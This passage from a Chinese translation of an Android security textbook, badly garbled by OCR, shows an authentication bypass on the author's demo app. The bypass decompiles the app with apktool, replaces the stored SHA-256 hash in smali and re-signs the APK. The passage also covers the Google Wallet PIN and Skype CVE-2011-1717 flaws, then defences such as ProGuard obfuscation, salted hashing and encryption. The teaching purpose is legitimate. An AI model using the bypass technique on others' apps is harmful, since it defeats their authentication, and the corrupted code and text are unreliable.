变量 v10 比较 。 如 果 这 两 个 值 相同 ， 用 户 即 可 登 人 。 这 时 ， 可 以 使 用 SHA-256 算 
法 创建 一 个 散 列 值 ， 然 后 增加 一 条 语句 将 该 值 写 入 到 v8 中 ， 从 而 根据 用 户 的 需要 


© SHA (Secure Hash Algorithm ， 安 全 散 列 算法 ) ， 由 美国 国家 安全 局 (NSA) 设计 ， 并 由 美国 国家 标准 
与 技术 研究 院 《NIST) 发 布 ， 是 一 种 能 计算 出 一 个 数字 和 信息 所 对 应 到 的 、 长 度 固 定 的 字符 串 (又 称 
信息 摘要 ) 的 算法 ， 对 不 同 的 输入 信息 进行 计算 ， 得 到 对 应 的 不 同 字符 串 的 概率 很 高 。SHA-256 是 
SHA 家 族 的 五 个 算法 之 一 。 一 一 详 者 注 
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# virtuol methods 
.method public getHosh(Ljeva/long/Strina; )[8 
locals 5 
pa^ometer "possaond 
annotation system Ldalvik/annotation/Throws ; 
volue = { 
Liovo/ lo/UnsupportedEncodingEx ceprion; 


„end annotation 


prologue 
„line 70 
const/ vi, Wr 


MIL 71 
-local v1, sDigest:i jeva/securi ty/Messageti gest ; 
invoke-virtual {p0}, Londsec/test/XeyPad; -»getResounces()Landroi d/content/res/Resources ; 


move-result-object v2 


-line 72 
.locol v2, res:Landroid/content/res/Resources ; 
const/highl6 v4, Qx7f04 


invoke-virtual (v2, v4), Landroid/content/res/Resources ; -»getStrinaC 1). javo/lang/String; 
move-result-object v3 


uit Ne 

local v3, sSalt:Ljova/long/String; 
try stort 0 

const-string v4, "SHA-256" 


invoxe-stptic [v4], Ljava/securiíty/MessogeDlgest ; -»getInstonce(ct javo/long/String; 0 java/security/Messogeti gest; 
stry end 8 
catch Ljavo/security/NoSuchAigorithmException; (;try start € .. :try end 9) :cotch 8 


move-result-object v1 


„line 8 
:goto. 8 


invoke-v1rtual (v1), Ljava/securi ty/Messogetri gest ; -»reset()v 


SIL M 
imvoke-virtual {v3}, Ljava/lang/String; -»getBytes() [8 





图 7. 12 KeyPad $ 1. smali 文件 内 的 SHA-256 字符 串 


修改 密码 ， 绕 过 认证 。 图 7. 13 显示 的 是 使 用 apktool 工具 产生 的 原始 smali 文件 ， 
图 7. 14 显示 的 是 修改 后 的 smali 文件 ， 该 文件 包含 下 述 语句 (使 用 SHA-256 算法 
计算 “1234” 添加 盐 值 号 后 的 散 列 值 ) : 


const- string v8 
“2DD225ED6888BA62465CF4C54DB21 FC17700925D0BD0774EE60B600B0172E916” 


需要 注意 的 是 ， 通 常会 在 hash 算法 中 加 入 一 个 “ 盐 但 -。 找 出 该 盐 值 (以 
及 该 应 用 程序 原始 密码 的 hash 值 )， 就 留 给 读者 作为 练习 。 一 旦 读者 能 够 获得 
这 个 hash 值 和 盐 值 ， 就 可 以 通过 不 停 地 将 生成 密码 计算 得 到 的 hash 值 同 该 应 
用 程序 文件 中 存储 的 hash EAER, HITE. MAREA BA E 
提供 。 

步骤 3: 重新 编译 应 用 程序 

如 图 7. 15 所 示 ， 可 以 使 用 命令 “apktool b” 将 修改 后 的 smali 代码 重新 汇编 ， 
打包 成 apk 文件 。 新 生成 的 apk 文件 放置 在 dist 目录 下 ， 如 图 7. 16 HZR o 


C 盐 值 (Sal), ， 就 是 在 密码 hash 过 程 中 添加 的 额外 的 随机 值 ， 用 于 防止 暴力 破解 出 密码 明文 。 一 一 译 
者 注 
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图 7.13 “还 eqz v10” 语 句 比 较 v8 中 的 散 列 值 和 计算 产生 的 散 列 值 


将 新 打包 的 apk 安装 在 设备 或 模拟 右上 之 前 ， 需 要 对 apk 文件 进行 签名 处 理 。 
如 图 7.17 所 示 ， 读 者 可 以 在 网 上 免费 下 载 Signapk 工具 。 在 修改 后 的 应 用 程序 上 ， 
读者 可 以 输入 “1234” 作 为 密码 登录 并 使 用 该 应 用 程序 了 。 

上 述 技 术 主 要 用 于 分 析 、 反 编译 和 重新 编译 应 用 程序 。 本 市 以 作者 编写 的 应 用 
程序 为 例 ， 演 示 如 何 利用 该 应 用 程序 的 源 洞 绕 过 认证 机 制 ， 访 间 应 用 程序 的 数据 和 
功能 。 这 些 漏洞 并 不 仅仅 是 出 于 理论 上 的 假设 ， 在 很 多 类 似 的 案例 中 ， 都 存在 利用 
相似 的 问题 次 用 用 户 数 据 的 情况 。 
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), L9ovo/lang/String; -»eqguoc! sCL i 


Londiec/test KeyPods} 


Lerotld/widoe' 


KeyPods1 


dmi doet/ 


X ada - 


tton: I 
pd, Lóndsec/test/XueyPad$ii ; -»t* LS 1E. LT RARE 


Landsec/ test /KeyPod, -»getApop:t cation ontext( )Landeo! dy 


pentestusr1*tools-qg l T secure app 
AndroidMani fest xml 


pentestusri&tools-gibbons-vm-2: -/Android/android-sdk/tools/secure .app$ apktool b 
; Checking whether sources has changed... 


whether resources has changed... 
resources... 
j opk File 
ntestusri8too!s-gibbons-vm-2 :-/Android/android-sdk/tools/secure app$ is -| 


Lam LEE 08 0 7 


pentestusrl pentestusri 592 2012-02-28 08:52 AndroidManifest.»xm| 
pentestusrl pentestusr1 97 2012-02-28 08:52 apktool.ym! 
pentestusrl pentestusr1 4996 7012-02-28 09:01 
x 2 pentestusrl pentestusrl 4096 2012-02-28 09:91 
x 7 pentestusrl pentestusr1 4096 2012-02-28 08:52 
xr-x 3 pentestusrl pentestusrl 4096 2012-02-28 08:52 
pentestusri&tools -gibbons -vm-2: -/Android/android- sdk/tools/secure .app$ 





图 7.15 执行 “apktool b” 命 令 创建 的 新 目录 
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pentestusri6tools-gibbons-vm-2:-/Android/android-sdk/tools/secure app/dist$ ls 
SecureApp . apk 
pentestusriétools-gibbons-vm-2:-/Android/android-sdk/tools/secure app/dist$ cd .. 
pentestusr18tools-gibbons -vm-2:--/Android/android-sdk/tools/secure app$ ls 
AndroidManifest.xml  apktool.yml 


pentestusrlétools-gibbons -vm-2: -/Android/android-sdk/tools/secure app$ ls -l dist/ 
total 16 

-lrW-r--r-- 1 pentestusrl pentestusr1 15227 2012-02-28 09:01 SecureApp.apk 
pentestusri,tools-gibbons-vm-2:-/Android/android-sdk/tools/secure. app$ 





7.16 新 打包 的 apk 文件 放置 在 dist 目录 下 


O GEM. eaxiAnmel 一 bash 一 7Z5Sx24 aae EE 
Last login: Wed Dec 12 14:38:57 on ttys000 

anmmisra-mac:~ Anmol$ java -jar ~/Downloads/signapk. jar -/Downloads/certifi 
cate.pem ~/Downloads/key.pk8 dist/SecureApp.apk modifiedapp.apk 


Pu 





7.4 实例 1: Google Wallet 漏洞 


Google Wallet 是 Google Z z]JF ARE zc E, nI EUIS HI REFI ERE 
仓储 信用 卡号 码 礼品 卡 等 信息 ， 将 手机 变 身 为 移动 钱包 。 它 通过 NFC (Near 
Field Communication, jJrI3l [5 ) 技术 在 具有 PayPass 弓 终端 的 结账 柜台 (例如 ， 
MasterCard? ff] PayPass 系统 ) 上 进行 安全 支付 。 这 种 理念 是 ， 在 购买 商品 时 ， 采 用 
手机 文 付 来 其 代 使 用 传统 的 信用 卡 、 依 记 卡 或 礼品 卡 进 行文 付 。 

注意 : NEC 是 一 组 技术 标准 ， 它 能 够 通过 无 线 电 频 率 使 移动 设备 同 附近 的 设 
备 进行 通信 。 该 技术 可 以 应 用 在 交付 交 易 和 数据 交换 等 方面 。 

NFC 使 用 RFID 进行 无 线 通 信 ， 借助 “SE (Secure Element， 安 全 单元 ) ”设备 
确保 安全 性 。SE 设备 用 于 对 敏感 数据 进行 加 密 ， 如 信用 卡号 码 等 。 要 想 访问 这 些 
言 息 ， 用 户 需 要 提供 4 位 数字 的 PIN 人 码 ， 并 且 五 次 验证 失败 后 ,， 这些 数据 将 被 
删除 。 


© PayPass, $Æ MasterCard 组 织 推出 的 一 种 非 接 触 式 信 用 卡 系统 ， 非 接触 式 信用 卡 是 不 必 接 触 刷卡 机 就 
可 以 完成 信用 授权 以 及 信用 交易 。PayPass 系统 的 特色 是 不 必 将 信用 卡 交 给 店员 ， 可 有 效 减 少 盗 刷机 
会 。 一 一 译 者 注 

© MasterCard (万 事 达 国际 组 织 ) 是 一 个 由 超过 25000 个 金融 机 构 会 员 组 成 的 ， 在 美国 纽约 证 券 交 易 所 
上 市 的 有 限 公司 ， 万事 达 国 际 组 织 通 过 其 会 员 发 行 万 事 达 ( MasterCard) 信用 卡 和 万 事 顺 (Maestro) 
俩 记 卡 。 一 一 译 者 注 
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事实 证 明 ， 该 PIN 码 以 二 进 制 的 格式 存储 在 SQLite 数据 库 中 ， 通 过 ,Google 的 
" Protocol Buffers” 协 议 将 这 些 数据 编译 成 序列 化 的 数据 ， 进 行 存 储 或 交换 。Proto- 
col Buffers” 是 Google 开发 的 支持 库 ， 用 于 系统 之 间 传 递 信息 时 ， 对 结构 化 数据 进 
行 序列 化 处 理 。 从 这 些 二 进 制 字符 串 中 可 以 获得 该 FIN 码 的 内 容 ， 它 包括 一 个 盐 值 
和 一 个 使 用 SHA-256 算法 计算 的 散 列 值 字 符 串 。 知 道 PIN 码 只 由 4 位 数字 构成 的 
人 人， 能够 通过 皮 力 破解 的 方式 很 容易 地 破解 出 PIN 码 。 不 过 ， 只 有 对 设备 进行 root 
处 理 ， 才 能 够 获得 设备 上 的 这 一 数据 。 而 且 ， 有 时 无 需 太 费力 就 可 以 完成 对 设备 的 
root 处 理 ， 因 为 现在 已 经 有 很 多 工具 可 以 用 来 对 Android 设备 进行 root 操作 。 如 果 
该 者 想 了 解 更 多 相关 的 内 容 ， 可 参考 网 站 : https: //zvelo. com/blog/entry/ google- 


wallet- security- pin- exposure- vulnerability 。 
7.5 实例 2: Skype 漏洞 (CVE-2011-1717^) 


2011 Æ, Android 版 本 的 Skype 应 用 程序 被 发 现 使 用 SQLite3 数据 库存 储 用 户 
敏感 信息 ， 例 如 ， 用 户 ID、 联 系 人 信息 、 电 话 号 码 、 生 日 、 即 时 消息 记录 ， 以 
及 其 他 数据 。 而 且 ，Skype 应 用 程序 没有 使 用 适当 的 权限 (该 应 用 程序 使 用 了 
World readable 权限 ， 即 广泛 可 读 权 限 ) 对 这 些 数据 进行 安全 管理 ， 任 何 应 用 程 
序 或 用 户 都 能 够 盗 意 访问 这 些 数据 。 更 糟糕 的 是 ， 这 些 数 据 没 有 经 过 加 密 处 理 ， 
仅仅 采用 明文 的 方式 存储 在 SQLite 数据 库 中 。 美 国 科 技 网 站 Android Police 发 现 
该 漏洞 ， 并 且 编 写 了 一 个 POC 攻击 程序 ， 能 够 利用 该 漏洞 从 Skype 应 用 程序 上 获 
取 数 据 。 


7.6 防范 策略 
本 节 将 讨论 五 种 主要 的 防范 策略 ， 用 于 防止 应 用 程序 被 逆向 工程 ， 或 在 应 用 程 


© Protocol Buffers， 简 称 为 protobuf， 是 Google 公司 开发 的 一 种 数据 描述 语言 ， 类 似 于 XML， 能 够 将 结构 
化 数据 序列 化 ， 可 用 于 数据 存储 、 通 信 协 议 等 方面 。 它 不 依赖 于 语言 和 平台 ， 并 且 可 扩展 性 极 强 。 
现 阶 段 官方 支持 C+ +, Java, Python 等 三 种 编程 语言 ， 但 可 以 找到 大 量 的 几乎 涵盖 所 有 语言 的 第 三 
方 拓展 包 。 该 协议 广泛 用 于 各 种 结构 化 信息 存储 和 交换 。 一 一 译 者 注 

CVE (Common Vulnerabilities & Exposures, ， 公 共 漏 润 和 暴露 ) , 用 于 为 广泛 认同 的 信息 安全 漏洞 或 者 
已 经 暴露 出 来 的 弱点 给 出 一 个 公共 的 名 称 ， 它 是 国际 上 一 个 著名 的 漏洞 知识 库 ， 也 是 目前 在 国际 上 
最 具 公 信 力 的 安全 弱点 披露 与 发 布 机 构 ，CVE 组 织 是 一 个 由 企业 界 、 政 府 界 和 学 术 界 综合 参与 的 国 
际 组 织 ， 其 使 命 是 通过 非 营 利 的 组 织 形式 ， 对 漏洞 与 暴露 进行 统一 标识 ， 使 得 用 户 和 厂商 对 漏洞 与 
暴露 有 统一 的 认识 ， 从 而 更 加 快速 而 有 效 地 去 鉴别 、 发 现 和 修复 软件 产品 的 脆弱 性 。CVE 于 1999 年 
9 月 建立 ， 目 前 其 命名 方案 由 MITER 公司 主持 ， 命 名 规则 采用 “CVE- 漏 洞 发 现年 份 -漏洞 编号 ” 规 
则 ， 本 节 所 述 的 Skype 漏洞 的 CVE 编号 为 CVE-2011-1717。 一 一 译 者 注 
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序 被 逆 疝 工程 处 理 的 过 程 中 ， 尽 可 能 地 减少 信息 的 泄露 。 
7.6.1 代码 混淆 


代码 混 消 是 程序 开发 人 员 刻 意 使 用 的 一 种 处 理 ， 它 可 以 降低 源码 或 机 器 码 的 可 
读 性 ， 让 人 难以 理解 代码 的 真实 内 容 ， 从 而 增加 调试 或 逆向 工程 可 执行 文件 的 难度 。 
企业 一 般 使 用 这 种 技术 保护 他 们 的 IP 地 址 或 防止 企业 开发 的 应 用 程序 产品 被 自 改 。 

大 多 数 的 Android 应 用 程序 使 用 Java 语言 编写 ， 因 为 Java 代码 会 被 编译 成 类 文 
件 这 种 字 节 码 ， 运 行 在 虚拟 机 上 。 同 使 用 C/C ++ 语 言 编 译 出 的 二 进 制 可 执行 文件 
THEE, Java 生成 的 刍 节 码 文件 更 容易 被 逆 癌 工程 或 反 编译 。 因 此 ， 不 能 仅仅 依靠 代 
码 混 消 保护 知识 产权 或 用 户 隐 私 ， 必 须要 假设 存在 这 种 情况 ， 即 某 人 通过 反 编 译 
apk， 能 够 或 多 或 少 地 获得 应 用 程序 的 源码 。 所 以 ， 与 完全 依赖 代码 混淆 的 做 法 相 
反 ， 本 书 建议 应 当 尽 可 能 多 地 依 徘 “服务 器 端 人 处 理 (Server Side Processing)” 5X 
略 ， 保 护 应 用 程序 的 信息 安全 ， 这 部 分 策略 的 内 容 ， 将 在 下 一 节 介 绍 。 

ProGuard 是 用 于 Android 系统 的 、 可 免费 获得 使 用 的 Java 混 消 需 之 一 ， 它 能 够 
压缩 并 混 消 Java 类 文件 ， 检 测 并 删除 类 文件 中 没有 用 的 类 、 变 量 属性 ， 以 及 函数 
等 。 而 且 ，ProGuard 还 能 够 用 较 短 的 〈 且 有 可 能 是 毫 无 实际 意义 ) 名 字 将 类 文件 
中 的 这 些 变量 重新 命名 。 经 过 这 些 处 理 ， 增 加 了 破解 apk 文件 需要 的 时 间 。Pro- 
Guard 工具 已 经 被 集成 到 Android 内 置 系统 中 ， 只 有 使 用 release (发 布 ) 模式 编译 
的 应 用 程序 才能 使 用 ProGuard 工具 。 相 反 ， 使 用 debug 模式 编译 的 应 用 程序 不 能 使 
用 系统 内 置 的 ProGuard 工具 。 

如 果 想 要 使 用 内 置 的 ProGuard 工具 并 使 其 能 够 作为 Ant? a Eclipse? 编译 过 程 
中 的 一 个 步骤 自动 运行 ， 需 要 在 properties. cfg 文件 中 设置 proguard. config 属性 ， 该 
文件 位 于 Android 应 用 程序 项 目的 根 目 录 下 ， 如 图 7. 18 所 示 。 

图 7. 19 和 图 7.20 显示 的 是 使 用 JD-GUI 工具 查看 反 编译 后 的 代码 。 其 中 ， 
图 7. 19 显示 的 是 未 经 代码 混淆 处 理 的 代码 ， 图 7. 20 显示 的 是 使 用 ProGuard 工具 
进行 代码 混 消 处 理 后 的 代码 。 通 过 这 两 张 图 的 对 比 可 见 ，ProGuard 工具 缩短 了 类 的 
名 字 ， 并 重新 命名 类 名 ， 相 同 的 处 理 也 出 现在 类 文件 中 的 函数 和 变量 属性 上 面 。 由 
于 这 只 是 一 个 简单 的 应 用 程序 ， 代 码 混 消 并 没有 使 这 两 张 对 比 截图 内 容 产 生 较 大 的 
不 同 ， 但 对 于 复杂 的 应 用 程序 来 说 ， 代 码 混 清 的 效果 将 会 更 加 明显 。 


© Ant 是 Apache 软件 基金 会 JAKARTA 目录 中 的 一 个 子 项 目 ， 它 是 一 种 基于 Java 的 build (编译 ) 工具 ， 
理论 上 来 说 ， 它 有 些 类 似 于 (Unix) C 中 的 make 编译 工具 ， 但 没有 make 的 缺陷 。 译 者 注 

© Eclipse 是 一 个 开放 源 代 码 的 、 基 于 Java 的 可 扩展 开发 平台 。 就 其 本 身 而 言 ， 它 只 是 一 个 框架 和 一 组 
服务 ， 用 于 通过 插件 组 件 构建 开发 环境 。Eclipse 附带 了 一 个 标准 的 插件 集 ， 包 括 Java 开发 工具 (Ja- 
va Development Kit, JDK) 和 等， 用户 可 通过 下 载 安装 Android 插件 ADT (Android Development Tool, 
Android 开发 工具 ) ， 将 Eclipse 构建 成 Android 应 用 程序 的 开发 平台 。 一 一 译 者 注 
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F Package Explorer 1$ 、 pun 2. [D wejroropemes — 
23 id "aetimizoetiongasses S 
T. -dortusemixedcaseclassnames 
persegi -dantskipnonpubliclibraryclasses 
ey sc |  -dootoreverify 
b agen (Genecatec ju» Foe) -verbose 
b Bh Android 4.0.3 | -optimizations !code/simplification/arithmetic, I fieid/*, 1class/meroing/" 
i5 assets | 
L3 bin | keep public closs * oxtends android.app.Activity 
P res | keep public class " extends ondroid.app Application 
| keep public closs * extends android.app.Service 
si p i | -keep public closs * extends android. content. BroadcastReceiver 
|. proguard.cfg -keep public closs * extends android. content. ContentProvider 
8 praject.propenies | -keep public closs * extends android.app.backuo.BackupAgentHelper 
* 


-keep public class * extends android.opreference. Preference 
keep public class com android.vending.licensing. ILi consingService 


-keepclosseswitheenbernames class * ( 
notive «methozs»; 
) 


| 
-keepclasseswithmenbers class " { 

| public «init»(android.cantent.Context, ondroid vtil htributeSet); 
| } 

| 

[| 

| 


-keepclosseswithmembers class * { 
public «init»sCandroid.conkent.Context, ondroid.util,AttributeSet, int); 
) 


| -keepclossmembers class * extends condroid,opp, Activity { 
public void *(ondroid.vitw.Yiew); 


? 


-keepclosseembers enum " ( 
public stotic "*[] values); 
pubiic stctic ** yolueOf( java.lang.String); 


} 


-keep class * implements android.os.Porcelable [ 
public static finol ondroid.os.Porceloble$C^cotor *; 
} 


图 7.18 查看 Eclipse 开发 环境 下 的 proguard. cfg 文件 





pestem clobile.somples. Securepess; 


| v ss import android opp Activity; 
| attr | 
| » (D drawabie patte closs SecurePassActivity extends Activity 
> Qi I{ 
| bp aya public void onCreote(Rundle savedinstanceState) 
| (sing | f 
- Ds p 24 |  tuper.onCreate(savedInstanceStote); 


25 | setCoatentVi ew( 2130903040) ; 


28 | TextView tvLobel = (TextViem)findVienfiyId( 2131034112); 


| € getHash/String) : bytel) 29 | Button btnSubmit = (Button) findYi emftyId (2131834114); 
| € onCreate(Bundie) : void 30 ÉditText etPoss = (Edi tText)findVi enlyTa( 2131034113); 
| 31 TextVien tvMxg = (TextViem)findVienById( 2131034115); 
| 


11 btnSubmi t. setOnCli ckListener(nem View. OnClickListener(etPoss, btnSubsit, 


{ 
| public vold ooClick(View v) { 
i6 | String sHash = "abcdel'; 
37 | String Rand = "123456"; 
38 Charsequence ÓMessage = "Incorrect Passeord! Please try again"; 
40 | Kesources res = SecurePassActivity- this. getResources(); 
A String sPassword = this. volfetPass .getText(. toSteingO ; 
| | try 
[. | 1 
AX | bea) Who 和 - Corrmabnrehrtis. Wild — Mmm o Dom mmm m AN» 


7.19 ”通过 JD- GUI 查看 未 经 代码 混 消 处 理 的 代码 


对 于 Java 语言 来 说 ， 或 许 ProGuard 工具 不 是 最 好 的 代码 混淆 器 。 但 是 ， 在 没 
有 其 他 选择 的 时 候 ， 就 必须 要 使 用 ProGuard 工具 。 
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A* abytel] : String puslic class SecurePcskMLivity extends Activity 
€ orCreztelRaundie) | voc is 
w a public void on recte(9Sundle parameuncle) 
Y Ga i 

€ onia vid Suge* . or reate( paramiundle) ; 
wn" soos tentVi enc 211008 3040); 
Dor ndle - (TextY vem) findvieondby 4C 2251034112); 
Button local&utton = (Button)findvi 14( 23319941145; 
£ locoltd nm eb yTo( »1113) 


| TextVies locdlTextView = ClextV\ en) findyl ent y 102131834115); 
locollüutten.setOnClicktistener( new g(this, loedlEditText, locolfutton, porombBundie, iscalTextVtew)); 


t 
lecolMessageDiQest ~ MesscorDignst perinstoncel "A-2568" ); 
Coteh (NoSucnAlgori thw£xception lecalNoSuc^hALgorni thnException) 


YocnINoSuchAlgornti thnlxception. printS*ockTracet 2; 
! 

lotolMessageb: gest. reset(); 
egi ou nd — e gaen ytesQ) 


pr setlbutpaf “HN ' 


7.20 通过 JD-GCUI 查 看 经 过 代码 混 消 处 理 的 代码 


7.6.2 服务 器 端 处 理 


根据 应 用 程序 的 类 型 ， 可 以 将 敏感 操作 和 数据 处 理 放 在 服务 器 端 完成 。 例 如 ， 
对 于 那些 把 从 服务 器 问 获 取 的 数据 放 在 本 地 加 载 的 应 用 程序 (例如 ，twitter 等 ) 来 
说 ， 很 多 程序 上 的 逻辑 处 理 过 程 都 是 放 在 服务 器 端 执 行 的 。 一 旦 应 用 程序 认证 成 
功 ， 并 且 用 户 身 份 的 有 效 性 通过 验证 ， 应 用 程序 就 能 够 依靠 服务 器 端 完成 大 部 分 的 
处 理 过 程 。 这 样 ， 即 便 使 用 逆向 工程 破解 了 编译 应 用 程序 生成 的 二 进 制 安装 文件 
(apk 文件 ) ， 应 用 程序 中 很 多 逻辑 实现 的 内 容 也 不 会 被 窃取 ， 因 为 这 些 逻 辑 内 容 都 
是 在 服务 器 端 完成 的 。 


7.6.3 ARAI E fie FHib fa 


散 列 函 数 容易 产生 碰撞 2 。 而 且 ， 对 于 一 个 设计 不 良 的 散 列 函数 ， 不 排除 对 散 
列 值 成 功 实现 暴力 破解 的 可 能 。 但 是 ， 如 果 在 散 列 函数 的 设计 中 ， 最 大 化 地 提升 抗 
碰撞 能 力 ， 暴 力 破 解 就 会 变 得 难于 实现 (除非 政府 机 构 采 用 极其 强大 的 计算 能 力 
进行 破解 ) SHA-2 系列 算法 族 就 属于 具有 较 强 的 抗 磁 撞 能 力 的 散 列 算法 。 

通过 使 用 盐 值 可 以 生成 更 健壮 的 hash 值 。 在 加 密 技 术 中 ， 盐 值 由 随机 比特 位 
(bit) 组 成 ， 一 般 作 为 hash 函数 的 输入 之 一 (这 也 是 一 种 抗 碰 撞 的 方式 ) hash K 


日 ”由 于 hash 固定 长 度 输 出 的 特性 ， 必 然 会 存在 多 个 不 同 输入 产生 相同 输出 的 情况 。 如 果 两 个 输入 串 的 
hash 函数 的 值 一 样 ， 则 称 这 两 个 串 是 一 个 碰撞 (Collision), 在 理论 范围 内 ， 存 在 一 个 输出 串 对 应 无 
穷 多 个 输入 串 ， 所 以 碰撞 具有 其 必然 性 。 一 一 译 者 注 
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数 的 其 他 输入 为 保密 内 容 ， 如 PIN、 密 钥 或 密码 口令 等 。 这 样 就 使 得 暴力 破解 变 得 
更 加 困难 ， 因 为 需要 更 多 的 时 间或 空间 ， 即 使 使 用 彩虹 表 破 解 也 是 如 此 ; 彩虹 表 是 
一 组 针对 构成 密码 的 各 种 可 能 的 字母 组 合 ， 预 先 计 算 好 的 密码 hash 值 的 表格 ， 用 
来 比 对 查找 密码 的 hash 值 ， 使 破解 者 更 容易 、 更 快 地 获得 密码 明文 。 它 是 一 种 以 
空间 换 时 间或 时 间 与 空间 折 中 的 例子 ,， 例如， 将 大 量 可 被 用 作 密 码 的 字符 组 的 
hash 值 提前 计算 出 来 ， 存 放 在 存储 空间 。 由 于 可 被 用 作 密 码 的 字符 组 合 数量 庞大 ， 
所 以 大 量 计算 出 来 的 hash 值 将 占用 大 量 的 存储 空间 。 但 是 ， 用 户 在 破解 密码 时 ， 
只 需 通 过 查询 存储 空间 ， 找 到 相 匹 配 的 hash 值 ， 即 原始 密码 的 字符 组 合 ， 从 而 降 
低 密 码 破 解 所 需 的 计算 时 间 。 

此 外 ， 本 书 推荐 使 用 迭代 hash 处 理 敏感 数据 。 也 就 是 将 数据 生成 的 hash 值 再 
输入 hash 函数 计算 hash 值 ， 如 此 反复 。 如 果 这 种 反复 计算 hash 值 的 次 数 足 够 多 ， 
最 终 产 生 的 hash 值 将 相当 的 健壮 ， 足 以 应 对 任何 暴力 破解 攻击 ， 从 而 防止 攻击 者 
猜 出 最 初 的 hash 值 。 


7.6.4 选择 恰当 位 置 存 储 敏感 信息 


合理 选择 敏感 信息 的 存储 位 置 (以 及 访问 方法 ) 和 上 文 介绍 的 各 种 技术 同样 
重要 。 假 如 在 公开 的 存 取 位 置 (例如 ， 存 储 在 values. xml 文件 中 、SD 卡 上 或 是 具 
有 公共 可 读 属 性 的 本 地 文件 系统 上 ) 存储 hash 值 ， 那 么 就 会 使 攻击 者 能 够 比较 容 
易 地 获取 到 这 些 敏感 信息 。Android 系统 提供 了 一 种 很 好 的 方式 限制 数据 访问 
只 有 明确 地 将 数据 设置 成 可 被 访问 获得 ， 其 他 应 用 程序 或 用 户 才能 访问 该 数据 。 默 
认 情 况 下 ， 只 有 具有 应 用 程序 自身 UID 的 其 他 程序 或 用 户 才 能 访问 归属 于 该 UID 
的 数据 。 

理想 的 存储 敏感 信息 的 位 置 可 以 是 数据 库 (如 SQLite) 或 参数 文件 (如 prefer- 
ence ) ， 在 这 些 地 方 ， 其 他 应 用 不 能 对 其 进行 访问 。 


7.6.5 ”加密 技术 


在 迭代 散 列 一 节 中 ， 已 经 讨论 了 如 何 使 用 户 的 密码 或 敏感 信息 保密 性 更 强 、 更 
不 容易 被 破解 ， 也 就 是 通过 使 用 加 密 技术 ， 即 散 列 计算 和 盐 值 。 加 密 技术 还 可 以 用 
于 保护 用 户 数据 ， 对 于 Android 系统 来 说 ， 主 要 有 两 种 加 密 方式 : Android 应 用 
程序 能 够 以 加 密 的 方式 存储 数据 。 例 如 ， 用 户 的 联系 人 信息 经 过 加 密 处 理 ， 存 储 在 
SQLite3 数据 库 。@) 使 用 磁盘 加 密 ， 所 有 的 数据 在 飞速 写 人 磁盘 的 过 程 中 被 加 密 / 解 
密 。 对 于 系统 管理 员 来 说 ， 更 倾向 于 使 用 全 盘 加 密 ， 这 样 就 不 需要 依赖 开发 者 在 他 
们 的 应 用 程序 中 实现 加 密 功 能 。 


7.6.6 结论 
访问 控制 (依靠 操作 系统 防止 对 关键 文件 的 访问 ) 、 加 密 技 术 (依靠 加 密 以 及 
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散 列 计算 保护 机 密 数 据 ， 如 令 牌 值 ， 并 验证 应 用 程序 的 完整 性 ) 和 代码 混淆 ( 增 
加 类 文件 的 解密 难度 ) 是 程序 开发 人 员 可 以 利用 的 防止 应 用 程序 被 逆向 工程 的 主 
要 策略 。 在 Google Wallet 应 用 程序 漏洞 和 Skype 的 问题 中 ， 如 果 开 发 人 员 和 系统 管 
理 员 使 用 恰当 的 访问 控制 和 加 密 技 术 ， 这 些 报 出 的 安全 漏洞 和 问题 都 可 以 被 防止 。 


737265 uh 


本 章 讨论 了 一 种 可 能 的 情况 ， 即 无 需 源 码 反 汇编 和 重新 汇编 Android 应 用 程 
序 ， 然 后 使 用 作者 编写 的 示例 应 用 程序 “SecureApp”， 演 示 了 Android 应 用 程序 反 
汇编 和 重新 汇编 的 过 程 。 本 章 介绍 了 几 种 最 优 的 安全 策略 ， 防 止 应 用 程序 被 逆 回 工 
程 ， 以 及 减少 由 逆向 工程 可 能 造成 的 信息 泄露 问题 。 读 者 应 当 试 着 上 自己 开发 一 款 
Android 应 用 程序 (或 者 从 本 书 的 网 站 www. androidinsecurity. com 下 载 作 者 编写 的 
Android 应 用 程序 “SecureApp”) ， 验 证 本 章 列举 的 各 种 技术 。 


第 8 音 Al Android 


本 章 将 介绍 什么 是 移动 设备 取证 和 移动 设备 取证 技术 ， 引 导读 者 了 解 Android 
文件 系统 、 目 录 ， 以 及 挂 载 点 的 概念 。 本 章 还 将 介绍 如 何 对 SD 卡 进行 分 析 ， 以 及 
Android 系统 特有 的 取证 技术 。 最 后 将 通过 一 个 示例 ， 对 本 章 介 绍 的 各 个 专题 进行 
演示 。 


8.1 概述 


作为 数字 取证 技术 的 分 支 ， 移 动 设 备 取证 技术 主要 用 在 法 庭 取 证 条 件 下 ， 从 移 
动 设备 上 恢复 数字 证 据 或 数据 信息 。 

正如 在 第 1 章 的 讨论 ， 如 今 移动 设备 的 功能 非常 的 强大 ， 可 用 来 处 理 各 种 通 
信 、 交 易 ， 以 及 其 他 任务 。 在 一 部 智能 电话 上 上， 往往 会 存储 着 各 种 各 样 的 个 人 信 
息 ， 包 括 联系 人 信息 、 照 片 、 日 程 安排 、 记 事 本 、SMS 信息 、MMS 信息 、 电 子 邮 
件 、 浏 览 器 历史 、GPS 位 置信 息 、 社 交 媒 体 信息 、 金 融 数据 、 密 码 ， 等 等 。 如 果 手 
边 有 一 部 移动 设备 ， 不 论 它 是 来 自 合法 调查 活动 中 的 证 物 ， 还 是 出 于 安全 调查 目的 
而 需要 被 分 析 的 设备 ， 只 要 人 们 懂得 如 何 提取 信息 的 技术 ， 就 可 从 该 移动 设备 中 获 
取 大 量 的 信息 。 本 章 所 关注 的 内 容 ， 是 如 何 尽 可 能 多 地 从 移动 设备 上 提取 信息 ， 而 
不 仅仅 限于 在 法 庭 取 证 的 条 件 下 。 至 于 在 法 庭 取证 的 条 件 下 ， 如 何 正 确 地 实施 移动 
设备 的 取证 ， 则 不 属于 本 书 所 讨论 的 范围 。 | 

在 Android 设备 上 取证 ， 最 重要 的 是 对 Android 系统 的 理解 。 前 面 章节 已 经 讨论 
了 Android 系统 的 体系 结构 和 安全 模型 。 本 章 将 进一步 讨论 Android 文件 ZEE ALTI, 
包括 目录 、 文 件 、 挂 载 点 ， 以 及 文件 系统 。 读 者 需要 了 解 如 何 存 储 、 在 哪里 存储 ， 以 
及 哪 种 类 型 的 数据 存储 在 设备 上 。 之 后 ， 才 能 够 实际 地 提取 有 用 的 信息 。 数 据 能 够 以 
应 用 程序 /系统 特定 的 文件 格式 或 SQLite 数据 库 文 件 的 形式 ， 在 文件 系统 上 存储 。 


8.2 Android 文件 系统 


